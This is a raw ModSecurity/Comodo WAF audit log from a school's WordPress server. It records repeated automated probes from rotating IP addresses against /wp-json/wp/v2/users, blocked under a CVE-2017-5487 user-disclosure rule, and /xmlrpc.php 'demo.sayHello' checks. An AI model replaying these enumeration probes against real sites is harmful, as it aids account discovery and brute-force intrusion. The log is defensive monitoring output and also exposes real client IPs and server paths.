Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497023856101 2748 (- - -) Stopwatch2: 1747497023856101 2748; combined=1239, p1=428, p2=781, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d706706-Z-- --0942261a-A-- [17/May/2025:22:50:32 +0700] aCiwSATOsBn9MSWb6WLR3wAAAJg 103.236.140.4 43092 103.236.140.4 8181 --0942261a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0942261a-C-- demo.sayHello --0942261a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0942261a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497032391714 5481 (- - -) Stopwatch2: 1747497032391714 5481; combined=4324, p1=546, p2=3540, p3=36, p4=35, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0942261a-Z-- --aedf580c-A-- [17/May/2025:22:51:54 +0700] aCiwmgTOsBn9MSWb6WLR5wAAAIM 103.236.140.4 43234 103.236.140.4 8181 --aedf580c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aedf580c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aedf580c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497114182000 3005 (- - -) Stopwatch2: 1747497114182000 3005; combined=1376, p1=460, p2=874, p3=0, p4=0, p5=42, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aedf580c-Z-- --ff8c6163-A-- [17/May/2025:22:52:02 +0700] aCiwogTOsBn9MSWb6WLR7AAAAJQ 103.236.140.4 43250 103.236.140.4 8181 --ff8c6163-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff8c6163-C-- demo.sayHello --ff8c6163-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff8c6163-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497122350796 6304 (- - -) Stopwatch2: 1747497122350796 6304; combined=4638, p1=617, p2=3782, p3=40, p4=43, p5=94, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff8c6163-Z-- --7642a17b-A-- [17/May/2025:22:52:22 +0700] aCiwthKi5m5upc8uMd4YuAAAAMM 103.236.140.4 43426 103.236.140.4 8181 --7642a17b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7642a17b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7642a17b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497142743775 2762 (- - -) Stopwatch2: 1747497142743775 2762; combined=1283, p1=422, p2=824, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7642a17b-Z-- --05fe3412-A-- [17/May/2025:22:52:30 +0700] aCiwvnyxdQCiyU1ENFehyAAAABg 103.236.140.4 43494 103.236.140.4 8181 --05fe3412-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05fe3412-C-- demo.sayHello --05fe3412-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05fe3412-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497150055144 5728 (- - -) Stopwatch2: 1747497150055144 5728; combined=4209, p1=532, p2=3453, p3=32, p4=34, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05fe3412-Z-- --7e107028-A-- [17/May/2025:22:53:04 +0700] aCiw4HyxdQCiyU1ENFeh-wAAABg 103.236.140.4 43774 103.236.140.4 8181 --7e107028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e107028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e107028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497184164856 2708 (- - -) Stopwatch2: 1747497184164856 2708; combined=1233, p1=441, p2=763, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e107028-Z-- --ca4e7f16-A-- [17/May/2025:22:53:10 +0700] aCiw5nyxdQCiyU1ENFeiCgAAABE 103.236.140.4 43842 103.236.140.4 8181 --ca4e7f16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca4e7f16-C-- demo.sayHello --ca4e7f16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca4e7f16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497190843580 5280 (- - -) Stopwatch2: 1747497190843580 5280; combined=4246, p1=508, p2=3512, p3=36, p4=35, p5=92, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca4e7f16-Z-- --4422ad62-A-- [17/May/2025:22:53:17 +0700] aCiw7XyxdQCiyU1ENFeiGQAAAAc 103.236.140.4 43920 103.236.140.4 8181 --4422ad62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4422ad62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4422ad62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497197635827 2065 (- - -) Stopwatch2: 1747497197635827 2065; combined=1101, p1=345, p2=729, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4422ad62-Z-- --f669611c-A-- [17/May/2025:22:53:25 +0700] aCiw9em4kjNN-hEbWjKhpgAAAFU 103.236.140.4 43988 103.236.140.4 8181 --f669611c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f669611c-C-- demo.sayHello --f669611c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f669611c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497205645045 5571 (- - -) Stopwatch2: 1747497205645045 5571; combined=4134, p1=538, p2=3371, p3=34, p4=35, p5=93, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f669611c-Z-- --fe3b7a07-A-- [17/May/2025:22:53:26 +0700] aCiw9nyxdQCiyU1ENFeiLQAAABQ 103.236.140.4 44002 103.236.140.4 8181 --fe3b7a07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe3b7a07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe3b7a07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497206504298 2963 (- - -) Stopwatch2: 1747497206504298 2963; combined=1438, p1=478, p2=919, p3=0, p4=0, p5=41, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe3b7a07-Z-- --50602d28-A-- [17/May/2025:22:53:34 +0700] aCiw_nyxdQCiyU1ENFeiPwAAAAI 103.236.140.4 44110 103.236.140.4 8181 --50602d28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50602d28-C-- demo.sayHello --50602d28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50602d28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497214943626 5710 (- - -) Stopwatch2: 1747497214943626 5710; combined=4206, p1=526, p2=3451, p3=34, p4=34, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50602d28-Z-- --da2cea62-A-- [17/May/2025:22:53:54 +0700] aCixEhKi5m5upc8uMd4YywAAAMw 103.236.140.4 44122 103.236.140.4 8181 --da2cea62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da2cea62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da2cea62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497234706723 2750 (- - -) Stopwatch2: 1747497234706723 2750; combined=1228, p1=444, p2=755, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da2cea62-Z-- --1818a50f-A-- [17/May/2025:22:54:05 +0700] aCixHRKi5m5upc8uMd4YzAAAANg 103.236.140.4 44130 103.236.140.4 8181 --1818a50f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1818a50f-C-- demo.sayHello --1818a50f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1818a50f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497245854278 5069 (- - -) Stopwatch2: 1747497245854278 5069; combined=3671, p1=469, p2=3009, p3=29, p4=31, p5=79, sr=65, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1818a50f-Z-- --7632077d-A-- [17/May/2025:22:54:26 +0700] aCixMnyxdQCiyU1ENFeiUQAAAAo 103.236.140.4 44206 103.236.140.4 8181 --7632077d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7632077d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7632077d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497266738531 2854 (- - -) Stopwatch2: 1747497266738531 2854; combined=1293, p1=429, p2=835, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7632077d-Z-- --3a661937-A-- [17/May/2025:22:54:33 +0700] aCixOQTOsBn9MSWb6WLSAQAAAIc 103.236.140.4 44214 103.236.140.4 8181 --3a661937-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a661937-C-- demo.sayHello --3a661937-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a661937-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497273750967 5617 (- - -) Stopwatch2: 1747497273750967 5617; combined=4129, p1=591, p2=3377, p3=24, p4=26, p5=66, sr=98, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a661937-Z-- --48c29516-A-- [17/May/2025:22:55:03 +0700] aCixV3yxdQCiyU1ENFeiagAAAAE 103.236.140.4 44394 103.236.140.4 8181 --48c29516-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48c29516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c29516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497303989241 2641 (- - -) Stopwatch2: 1747497303989241 2641; combined=1217, p1=411, p2=776, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c29516-Z-- --ac76a028-A-- [17/May/2025:22:55:11 +0700] aCixX3yxdQCiyU1ENFeieAAAAAs 103.236.140.4 44458 103.236.140.4 8181 --ac76a028-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac76a028-C-- demo.sayHello --ac76a028-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac76a028-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against 